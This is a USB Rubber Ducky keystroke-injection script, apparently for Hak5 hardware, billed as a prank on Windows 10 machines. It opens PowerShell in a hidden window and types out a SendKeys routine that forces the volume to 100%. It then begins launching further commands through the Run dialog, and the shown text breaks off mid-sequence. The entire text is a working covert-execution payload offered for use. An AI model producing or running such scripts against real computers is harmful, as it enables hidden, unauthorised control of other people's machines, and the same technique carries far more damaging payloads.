REM Title: Seniors_Webcam_Prank REM Author: LulzAnarchyAnon REM Description: The first thing is volume is increased to 100% to draw attention. REM Afterwards Two seniors appear to be webcaming with you, and you don't know why! REM Target: Windows 10 PowerShell REM Props: Darren Kitchen and I am Jakoby REM Version: 1.0 REM Category: Prank GUI r DELAY 200 STRING powershell -windowstyle hidden DELAY 200 ENTER DELAY 500 STRING Function Set-SoundVolume DELAY 100 ENTER STRING { DELAY 100 ENTER STRING Param( DELAY 100 ENTER STRING [Parameter(Mandatory=$true)] DELAY 100 ENTER STRING [ValidateRange(0,100)] DELAY 100 ENTER STRING [Int] DELAY 100 ENTER STRING $volume DELAY 100 ENTER STRING ) DELAY 100 ENTER # Calculate number of key presses. STRING $keyPresses = [Math]::Ceiling( $volume / 2 ) DELAY 100 ENTER # Create the Windows Shell object. STRING $obj = New-Object -ComObject WScript.Shell DELAY 100 ENTER # Set volume to zero. STRING 1..50 | ForEach-Object { $obj.SendKeys( [char] 174 ) } DELAY 100 ENTER # Set volume to specified level. STRING for( $i = 0; $i -lt $keyPresses; $i++ ) DELAY 100 ENTER STRING { DELAY 100 ENTER STRING $obj.SendKeys( [char] 175 ) DELAY 100 ENTER STRING } DELAY 100 ENTER STRING } DELAY 100 ENTER STRING New-Alias -Name "ssv" Set-SoundVolume DELAY 100 ENTER # Example usage STRING Set-SoundVolume 100 DELAY 100 ENTER DELAY 1000 STRING exit DELAY 100 ENTER DELAY 5000 GUI r DELAY 100 STRING cmd /c start DELAY 200 ENTER DELAY 500 TAB DELAY 200 ENTER DELAY 200 TAB DELAY 200 f